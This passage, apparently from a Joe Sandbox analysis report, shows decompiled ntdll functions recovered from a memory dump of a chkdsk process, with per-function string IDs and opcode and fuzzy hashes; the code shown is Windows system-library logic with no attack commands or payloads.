                                                      					L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                                      					if(_t65 >= 0) {
                                                      						_t52 = 1;
                                                      					} else {
                                                      						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                                      							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                                      						}
                                                      					}
                                                      					_t35 = _t52;
                                                      					goto L8;
                                                      				}
                                                      			}

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @
                                                      • API String ID: 0-2766056989
                                                      • Opcode ID: 4f7bc29cd55a152e69625ac7e14cebbc41643b4a313795c40e14924fe149cfee
                                                      • Instruction ID: 318ea455d96ba1a565f834d325a541256c6cc24f2fade5d5a08717270cadc623
                                                      • Opcode Fuzzy Hash: 4f7bc29cd55a152e69625ac7e14cebbc41643b4a313795c40e14924fe149cfee
                                                      • Instruction Fuzzy Hash: 42316EB1608345DFD711DF28C9809ABBBE9EB85654F00092EF9D693311E639ED04DBE2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 72%
                                                      			E04D91B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                                      				intOrPtr _v8;
                                                      				char _v16;
                                                      				intOrPtr* _t26;
                                                      				intOrPtr _t29;
                                                      				void* _t30;
                                                      				signed int _t31;
                                                      
                                                      				_t27 = __ecx;
                                                      				_t29 = __edx;
                                                      				_t31 = 0;
                                                      				_v8 = __edx;
                                                      				if(__edx == 0) {
                                                      					L18:
                                                      					_t30 = 0xc000000d;
                                                      					goto L12;
                                                      				} else {
                                                      					_t26 = _a4;
                                                      					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                                      						goto L18;
                                                      					} else {
                                                      						E04DCBB40(__ecx,  &_v16, __ecx);
                                                      						_push(_t26);
                                                      						_push(0);
                                                      						_push(0);
                                                      						_push(_t29);
                                                      						_push( &_v16);
                                                      						_t30 = E04DCA9B0();
                                                      						if(_t30 >= 0) {
                                                      							_t19 =  *_t26;
                                                      							if( *_t26 != 0) {
                                                      								goto L7;
                                                      							} else {
                                                      								 *_a8 =  *_a8 & 0;
                                                      							}
                                                      						} else {
                                                      							if(_t30 != 0xc0000023) {
                                                      								L9:
                                                      								_push(_t26);
                                                      								_push( *_t26);
                                                      								_push(_t31);
                                                      								_push(_v8);
                                                      								_push( &_v16);
                                                      								_t30 = E04DCA9B0();
                                                      								if(_t30 < 0) {
                                                      									L12:
                                                      									if(_t31 != 0) {
                                                      										L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                                      									}
                                                      								} else {
                                                      									 *_a8 = _t31;
                                                      								}
                                                      							} else {
                                                      								_t19 =  *_t26;
                                                      								if( *_t26 == 0) {
                                                      									_t31 = 0;
                                                      								} else {
                                                      									L7:
                                                      									_t31 = L04DA4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                                      								}
                                                      								if(_t31 == 0) {
                                                      									_t30 = 0xc0000017;
                                                      								} else {
                                                      									goto L9;
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				return _t30;
                                                      			}










                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: WindowsExcludedProcs
                                                      • API String ID: 0-3583428290
                                                      • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                      • Instruction ID: 844a98b2a518c008d6addcf3593420f8bef13df8d5e0a687037e3472a22b14f4
                                                      • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                      • Instruction Fuzzy Hash: 9A21B37670122AABEF22AA969840F6FB7BDEB41754F094426B904DB204E630FD0197A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E04DAF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                      				intOrPtr _t13;
                                                      				intOrPtr _t14;
                                                      				signed int _t16;
                                                      				signed char _t17;
                                                      				intOrPtr _t19;
                                                      				intOrPtr _t21;
                                                      				intOrPtr _t23;
                                                      				intOrPtr* _t25;
                                                      
                                                      				_t25 = _a8;
                                                      				_t17 = __ecx;
                                                      				if(_t25 == 0) {
                                                      					_t19 = 0xc00000f2;
                                                      					L8:
                                                      					return _t19;
                                                      				}
                                                      				if((__ecx & 0xfffffffe) != 0) {
                                                      					_t19 = 0xc00000ef;
                                                      					goto L8;
                                                      				}
                                                      				_t19 = 0;
                                                      				 *_t25 = 0;
                                                      				_t21 = 0;
                                                      				_t23 = "Actx ";
                                                      				if(__edx != 0) {
                                                      					if(__edx == 0xfffffffc) {
                                                      						L21:
                                                      						_t21 = 0x200;
                                                      						L5:
                                                      						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                                                      						 *_t25 = _t13;
                                                      						L6:
                                                      						if(_t13 == 0) {
                                                      							if((_t17 & 0x00000001) != 0) {
                                                      								 *_t25 = _t23;
                                                      							}
                                                      						}
                                                      						L7:
                                                      						goto L8;
                                                      					}
                                                      					if(__edx == 0xfffffffd) {
                                                      						 *_t25 = _t23;
                                                      						_t13 = _t23;
                                                      						goto L6;
                                                      					}
                                                      					_t13 =  *((intOrPtr*)(__edx + 0x10));
                                                      					 *_t25 = _t13;
                                                      					L14:
                                                      					if(_t21 == 0) {
                                                      						goto L6;
                                                      					}
                                                      					goto L5;
                                                      				}
                                                      				_t14 = _a4;
                                                      				if(_t14 != 0) {
                                                      					_t16 =  *(_t14 + 0x14) & 0x00000007;
                                                      					if(_t16 <= 1) {
                                                      						_t21 = 0x1f8;
                                                      						_t13 = 0;
                                                      						goto L14;
                                                      					}
                                                      					if(_t16 == 2) {
                                                      						goto L21;
                                                      					}
                                                      					if(_t16 != 4) {
                                                      						_t19 = 0xc00000f0;
                                                      						goto L7;
                                                      					}
                                                      					_t13 = 0;
                                                      					goto L6;
                                                      				} else {
                                                      					_t21 = 0x1f8;
                                                      					goto L5;
                                                      				}
                                                      			}












                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Actx
                                                      • API String ID: 0-89312691
                                                      • Opcode ID: 7f6adc2d3f057e618d5479bf7e032537c62684acdc31acbe683b95a61e5c047a
                                                      • Instruction ID: 61b2ede180c8325058d8c5bbeb4a035c5aed61c50efcd99f7e4ec3a1f2a20e5e
                                                      • Opcode Fuzzy Hash: 7f6adc2d3f057e618d5479bf7e032537c62684acdc31acbe683b95a61e5c047a
                                                      • Instruction Fuzzy Hash: AB11BF353046528BEB744F1DD8907367296BB96764F2549AEE4A2CB391EBB0F8618380
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 71%
                                                      			E04E38DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                      				intOrPtr _t35;
                                                      				void* _t41;
                                                      
                                                      				_t40 = __esi;
                                                      				_t39 = __edi;
                                                      				_t38 = __edx;
                                                      				_t35 = __ecx;
                                                      				_t34 = __ebx;
                                                      				_push(0x74);
                                                      				_push(0x4e60d50);
                                                      				E04DDD0E8(__ebx, __edi, __esi);
                                                      				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                                      				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                                      				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                                      					E04E15720(0x65, 0, "Critical error detected %lx\n", _t35);
                                                      					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                                      						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                                      						asm("int3");
                                                      						 *(_t41 - 4) = 0xfffffffe;
                                                      					}
                                                      				}
                                                      				 *(_t41 - 4) = 1;
                                                      				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                                      				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                                      				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                                      				 *((intOrPtr*)(_t41 - 0x64)) = L04DDDEF0;
                                                      				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                                      				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                                      				_push(_t41 - 0x70);
                                                      				L04DDDEF0(1, _t38);
                                                      				 *(_t41 - 4) = 0xfffffffe;
                                                      				return E04DDD130(_t34, _t39, _t40);
                                                      			}






                                                      Strings
                                                      • Critical error detected %lx, xrefs: 04E38E21
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Critical error detected %lx
                                                      • API String ID: 0-802127002
                                                      • Opcode ID: 10621465bfc0fca3abc27a8200cab1525b804cbba7827bda7eed0d1d9ef412d9
                                                      • Instruction ID: be3ad647753b2405a4d23e40f279a7523f6e528edaad100de1bf544ba44c068e
                                                      • Opcode Fuzzy Hash: 10621465bfc0fca3abc27a8200cab1525b804cbba7827bda7eed0d1d9ef412d9
                                                      • Instruction Fuzzy Hash: 34115771E44348DBEF26DFA589097DCBBB1BB04319F20521EE0696B282D2302601CF14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 04E1FF60
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                      • API String ID: 0-1911121157
                                                      • Opcode ID: 14f08958ca8dc95839fe024b9b9c2a54033ce2e7ab4911d860afa6727639890c
                                                      • Instruction ID: 8161b0f894d6c7229a9b476305ac60e60b5263127d3df5daeaa9c12c209877a9
                                                      • Opcode Fuzzy Hash: 14f08958ca8dc95839fe024b9b9c2a54033ce2e7ab4911d860afa6727639890c
                                                      • Instruction Fuzzy Hash: 4411C071A90144EFEF26DF50C949F98BBB2FF48719F148094E5096B2B1C779B940DBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 88%
                                                      			E04E55BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                                      				signed int _t296;
                                                      				signed char _t298;
                                                      				signed int _t301;
                                                      				signed int _t306;
                                                      				signed int _t310;
                                                      				signed char _t311;
                                                      				intOrPtr _t312;
                                                      				signed int _t313;
                                                      				void* _t327;
                                                      				signed int _t328;
                                                      				intOrPtr _t329;
                                                      				intOrPtr _t333;
                                                      				signed char _t334;
                                                      				signed int _t336;
                                                      				void* _t339;
                                                      				signed int _t340;
                                                      				signed int _t356;
                                                      				signed int _t362;
                                                      				short _t367;
                                                      				short _t368;
                                                      				short _t373;
                                                      				signed int _t380;
                                                      				void* _t382;
                                                      				short _t385;
                                                      				signed short _t392;
                                                      				signed char _t393;
                                                      				signed int _t395;
                                                      				signed char _t397;
                                                      				signed int _t398;
                                                      				signed short _t402;
                                                      				void* _t406;
                                                      				signed int _t412;
                                                      				signed char _t414;
                                                      				signed short _t416;
                                                      				signed int _t421;
                                                      				signed char _t427;
                                                      				intOrPtr _t434;
                                                      				signed char _t435;
                                                      				signed int _t436;
                                                      				signed int _t442;
                                                      				signed int _t446;
                                                      				signed int _t447;
                                                      				signed int _t451;
                                                      				signed int _t453;
                                                      				signed int _t454;
                                                      				signed int _t455;
                                                      				intOrPtr _t456;
                                                      				intOrPtr* _t457;
                                                      				short _t458;
                                                      				signed short _t462;
                                                      				signed int _t469;
                                                      				intOrPtr* _t474;
                                                      				signed int _t475;
                                                      				signed int _t479;
                                                      				signed int _t480;
                                                      				signed int _t481;
                                                      				short _t485;
                                                      				signed int _t491;
                                                      				signed int* _t494;
                                                      				signed int _t498;
                                                      				signed int _t505;
                                                      				intOrPtr _t506;
                                                      				signed short _t508;
                                                      				signed int _t511;
                                                      				void* _t517;
                                                      				signed int _t519;
                                                      				signed int _t522;
                                                      				void* _t523;
                                                      				signed int _t524;
                                                      				void* _t528;
                                                      				signed int _t529;
                                                      
                                                      				_push(0xd4);
                                                      				_push(0x4e61178);
                                                      				E04DDD0E8(__ebx, __edi, __esi);
                                                      				_t494 = __edx;
                                                      				 *(_t528 - 0xcc) = __edx;
                                                      				_t511 = __ecx;
                                                      				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                                                      				 *(_t528 - 0xbc) = __ecx;
                                                      				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                                                      				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                                                      				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                                                      				_t427 = 0;
                                                      				 *(_t528 - 0x74) = 0;
                                                      				 *(_t528 - 0x9c) = 0;
                                                      				 *(_t528 - 0x84) = 0;
                                                      				 *(_t528 - 0xac) = 0;
                                                      				 *(_t528 - 0x88) = 0;
                                                      				 *(_t528 - 0xa8) = 0;
                                                      				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                                                      				if( *(_t528 + 0x1c) <= 0x80) {
                                                      					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                                                      					if(__eflags != 0) {
                                                      						_t421 = E04E54C56(0, __edx, __ecx, __eflags);
                                                      						__eflags = _t421;
                                                      						if(_t421 != 0) {
                                                      							 *((intOrPtr*)(_t528 - 4)) = 0;
                                                      							E04DCD000(0x410);
                                                      							 *(_t528 - 0x18) = _t529;
                                                      							 *(_t528 - 0x9c) = _t529;
                                                      							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                                                      							E04E55542(_t528 - 0x9c, _t528 - 0x84);
                                                      						}
                                                      					}
                                                      					_t435 = _t427;
                                                      					 *(_t528 - 0xd0) = _t435;
                                                      					_t474 = _t511 + 0x65;
                                                      					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                      					_t511 = 0x18;
                                                      					while(1) {
                                                      						 *(_t528 - 0xa0) = _t427;
                                                      						 *(_t528 - 0xbc) = _t427;
                                                      						 *(_t528 - 0x80) = _t427;
                                                      						 *(_t528 - 0x78) = 0x50;
                                                      						 *(_t528 - 0x79) = _t427;
                                                      						 *(_t528 - 0x7a) = _t427;
                                                      						 *(_t528 - 0x8c) = _t427;
                                                      						 *(_t528 - 0x98) = _t427;
                                                      						 *(_t528 - 0x90) = _t427;
                                                      						 *(_t528 - 0xb0) = _t427;
                                                      						 *(_t528 - 0xb8) = _t427;
                                                      						_t296 = 1 << _t435;
                                                      						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                                      						__eflags = _t436 & _t296;
                                                      						if((_t436 & _t296) != 0) {
                                                      							goto L92;
                                                      						}
                                                      						__eflags =  *((char*)(_t474 - 1));
                                                      						if( *((char*)(_t474 - 1)) == 0) {
                                                      							goto L92;
                                                      						}
                                                      						_t301 =  *_t474;
                                                      						__eflags = _t494[1] - _t301;
                                                      						if(_t494[1] <= _t301) {
                                                      							L10:
                                                      							__eflags =  *(_t474 - 5) & 0x00000040;
                                                      							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                                      								L12:
                                                      								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                                                      								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                                      									goto L92;
                                                      								}
                                                      								_t442 =  *(_t474 - 0x11) & _t494[3];
                                                      								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                                      								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                                      									goto L92;
                                                      								}
                                                      								__eflags = _t442 -  *(_t474 - 0x11);
                                                      								if(_t442 !=  *(_t474 - 0x11)) {
                                                      									goto L92;
                                                      								}
                                                      								L15:
                                                      								_t306 =  *(_t474 + 1) & 0x000000ff;
                                                      								 *(_t528 - 0xc0) = _t306;
                                                      								 *(_t528 - 0xa4) = _t306;
                                                      								__eflags =  *0x4e760e8;
                                                      								if( *0x4e760e8 != 0) {
                                                      									__eflags = _t306 - 0x40;
                                                      									if(_t306 < 0x40) {
                                                      										L20:
                                                      										asm("lock inc dword [eax]");
                                                      										_t310 =  *0x4e760e8; // 0x0
                                                      										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                                      										__eflags = _t311 & 0x00000001;
                                                      										if((_t311 & 0x00000001) == 0) {
                                                      											 *(_t528 - 0xa0) = _t311;
                                                      											_t475 = _t427;
                                                      											 *(_t528 - 0x74) = _t427;
                                                      											__eflags = _t475;
                                                      											if(_t475 != 0) {
                                                      												L91:
                                                      												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                      												goto L92;
                                                      											}
                                                      											asm("sbb edi, edi");
                                                      											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                                      											_t511 = _t498;
                                                      											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                                      											__eflags =  *(_t312 - 5) & 1;
                                                      											if(( *(_t312 - 5) & 1) != 0) {
                                                      												_push(_t528 - 0x98);
                                                      												_push(0x4c);
                                                      												_push(_t528 - 0x70);
                                                      												_push(1);
                                                      												_push(0xfffffffa);
                                                      												_t412 = E04DC9710();
                                                      												_t475 = _t427;
                                                      												__eflags = _t412;
                                                      												if(_t412 >= 0) {
                                                      													_t414 =  *(_t528 - 0x98) - 8;
                                                      													 *(_t528 - 0x98) = _t414;
                                                      													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                                      													 *(_t528 - 0x8c) = _t416;
                                                      													 *(_t528 - 0x79) = 1;
                                                      													_t511 = (_t416 & 0x0000ffff) + _t498;
                                                      													__eflags = _t511;
                                                      												}
                                                      											}
                                                      											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                                      											__eflags = _t446 & 0x00000004;
                                                      											if((_t446 & 0x00000004) != 0) {
                                                      												__eflags =  *(_t528 - 0x9c);
                                                      												if( *(_t528 - 0x9c) != 0) {
                                                      													 *(_t528 - 0x7a) = 1;
                                                      													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                                                      													__eflags = _t511;
                                                      												}
                                                      											}
                                                      											_t313 = 2;
                                                      											_t447 = _t446 & _t313;
                                                      											__eflags = _t447;
                                                      											 *(_t528 - 0xd4) = _t447;
                                                      											if(_t447 != 0) {
                                                      												_t406 = 0x10;
                                                      												_t511 = _t511 + _t406;
                                                      												__eflags = _t511;
                                                      											}
                                                      											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                                                      											 *(_t528 - 0x88) = _t427;
                                                      											__eflags =  *(_t528 + 0x1c);
                                                      											if( *(_t528 + 0x1c) <= 0) {
                                                      												L45:
                                                      												__eflags =  *(_t528 - 0xb0);
                                                      												if( *(_t528 - 0xb0) != 0) {
                                                      													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                      													__eflags = _t511;
                                                      												}
                                                      												__eflags = _t475;
                                                      												if(_t475 != 0) {
                                                      													asm("lock dec dword [ecx+edx*8+0x4]");
                                                      													goto L100;
                                                      												} else {
                                                      													_t494[3] = _t511;
                                                      													_t451 =  *(_t528 - 0xa0);
                                                      													_t427 = E04DC6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                                                      													 *(_t528 - 0x88) = _t427;
                                                      													__eflags = _t427;
                                                      													if(_t427 == 0) {
                                                      														__eflags = _t511 - 0xfff8;
                                                      														if(_t511 <= 0xfff8) {
                                                      															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                                                      															asm("sbb ecx, ecx");
                                                      															__eflags = (_t451 & 0x000000e2) + 8;
                                                      														}
                                                      														asm("lock dec dword [eax+edx*8+0x4]");
                                                      														L100:
                                                      														goto L101;
                                                      													}
                                                      													_t453 =  *(_t528 - 0xa0);
                                                      													 *_t494 = _t453;
                                                      													_t494[1] = _t427;
                                                      													_t494[2] =  *(_t528 - 0xbc);
                                                      													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                                                      													 *_t427 =  *(_t453 + 0x24) | _t511;
                                                      													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                                                      													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                                                      													asm("movsd");
                                                      													asm("movsd");
                                                      													asm("movsd");
                                                      													asm("movsd");
                                                      													asm("movsd");
                                                      													asm("movsd");
                                                      													asm("movsd");
                                                      													asm("movsd");
                                                      													__eflags =  *(_t528 + 0x14);
                                                      													if( *(_t528 + 0x14) == 0) {
                                                      														__eflags =  *[fs:0x18] + 0xf50;
                                                      													}
                                                      													asm("movsd");
                                                      													asm("movsd");
                                                      													asm("movsd");
                                                      													asm("movsd");
                                                      													__eflags =  *(_t528 + 0x18);
                                                      													if( *(_t528 + 0x18) == 0) {
                                                      														_t454 =  *(_t528 - 0x80);
                                                      														_t479 =  *(_t528 - 0x78);
                                                      														_t327 = 1;
                                                      														__eflags = 1;
                                                      													} else {
                                                      														_t146 = _t427 + 0x50; // 0x50
                                                      														_t454 = _t146;
                                                      														 *(_t528 - 0x80) = _t454;
                                                      														_t382 = 0x18;
                                                      														 *_t454 = _t382;
                                                      														 *((short*)(_t454 + 2)) = 1;
                                                      														_t385 = 0x10;
                                                      														 *((short*)(_t454 + 6)) = _t385;
                                                      														 *(_t454 + 4) = 0;
                                                      														asm("movsd");
                                                      														asm("movsd");
                                                      														asm("movsd");
                                                      														asm("movsd");
                                                      														_t327 = 1;
                                                      														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                      														_t479 = 0x68;
                                                      														 *(_t528 - 0x78) = _t479;
                                                      													}
                                                      													__eflags =  *(_t528 - 0x79) - _t327;
                                                      													if( *(_t528 - 0x79) == _t327) {
                                                      														_t524 = _t479 + _t427;
                                                      														_t508 =  *(_t528 - 0x8c);
                                                      														 *_t524 = _t508;
                                                      														_t373 = 2;
                                                      														 *((short*)(_t524 + 2)) = _t373;
                                                      														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                                                      														 *((short*)(_t524 + 4)) = 0;
                                                      														_t167 = _t524 + 8; // 0x8
                                                      														E04DCF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                                                      														_t529 = _t529 + 0xc;
                                                      														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                      														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                                                      														 *(_t528 - 0x78) = _t479;
                                                      														_t380 =  *(_t528 - 0x80);
                                                      														__eflags = _t380;
                                                      														if(_t380 != 0) {
                                                      															_t173 = _t380 + 4;
                                                      															 *_t173 =  *(_t380 + 4) | 1;
                                                      															__eflags =  *_t173;
                                                      														}
                                                      														_t454 = _t524;
                                                      														 *(_t528 - 0x80) = _t454;
                                                      														_t327 = 1;
                                                      														__eflags = 1;
                                                      													}
                                                      													__eflags =  *(_t528 - 0xd4);
                                                      													if( *(_t528 - 0xd4) == 0) {
                                                      														_t505 =  *(_t528 - 0x80);
                                                      													} else {
                                                      														_t505 = _t479 + _t427;
                                                      														_t523 = 0x10;
                                                      														 *_t505 = _t523;
                                                      														_t367 = 3;
                                                      														 *((short*)(_t505 + 2)) = _t367;
                                                      														_t368 = 4;
                                                      														 *((short*)(_t505 + 6)) = _t368;
                                                      														 *(_t505 + 4) = 0;
                                                      														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                                      														_t327 = 1;
                                                      														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                      														_t479 = _t479 + _t523;
                                                      														 *(_t528 - 0x78) = _t479;
                                                      														__eflags = _t454;
                                                      														if(_t454 != 0) {
                                                      															_t186 = _t454 + 4;
                                                      															 *_t186 =  *(_t454 + 4) | 1;
                                                      															__eflags =  *_t186;
                                                      														}
                                                      														 *(_t528 - 0x80) = _t505;
                                                      													}
                                                      													__eflags =  *(_t528 - 0x7a) - _t327;
                                                      													if( *(_t528 - 0x7a) == _t327) {
                                                      														 *(_t528 - 0xd4) = _t479 + _t427;
                                                      														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                                      														E04DCF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                                      														_t529 = _t529 + 0xc;
                                                      														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                      														_t479 =  *(_t528 - 0x78) + _t522;
                                                      														 *(_t528 - 0x78) = _t479;
                                                      														__eflags = _t505;
                                                      														if(_t505 != 0) {
                                                      															_t199 = _t505 + 4;
                                                      															 *_t199 =  *(_t505 + 4) | 1;
                                                      															__eflags =  *_t199;
                                                      														}
                                                      														_t505 =  *(_t528 - 0xd4);
                                                      														 *(_t528 - 0x80) = _t505;
                                                      													}
                                                      													__eflags =  *(_t528 - 0xa8);
                                                      													if( *(_t528 - 0xa8) != 0) {
                                                      														_t356 = _t479 + _t427;
                                                      														 *(_t528 - 0xd4) = _t356;
                                                      														_t462 =  *(_t528 - 0xac);
                                                      														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                                      														_t485 = 0xc;
                                                      														 *((short*)(_t356 + 2)) = _t485;
                                                      														 *(_t356 + 6) = _t462;
                                                      														 *((short*)(_t356 + 4)) = 0;
                                                      														_t211 = _t356 + 8; // 0x9
                                                      														E04DCF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                                      														E04DCFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                                      														_t529 = _t529 + 0x18;
                                                      														_t427 =  *(_t528 - 0x88);
                                                      														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                      														_t505 =  *(_t528 - 0xd4);
                                                      														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                                      														 *(_t528 - 0x78) = _t479;
                                                      														_t362 =  *(_t528 - 0x80);
                                                      														__eflags = _t362;
                                                      														if(_t362 != 0) {
                                                      															_t222 = _t362 + 4;
                                                      															 *_t222 =  *(_t362 + 4) | 1;
                                                      															__eflags =  *_t222;
                                                      														}
                                                      													}
                                                      													__eflags =  *(_t528 - 0xb0);
                                                      													if( *(_t528 - 0xb0) != 0) {
                                                      														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                                      														_t458 = 0xb;
                                                      														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                                      														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                                                      														 *((short*)(_t427 + 4 + _t479)) = 0;
                                                      														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                                                      														E04DCFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                                                      														_t529 = _t529 + 0xc;
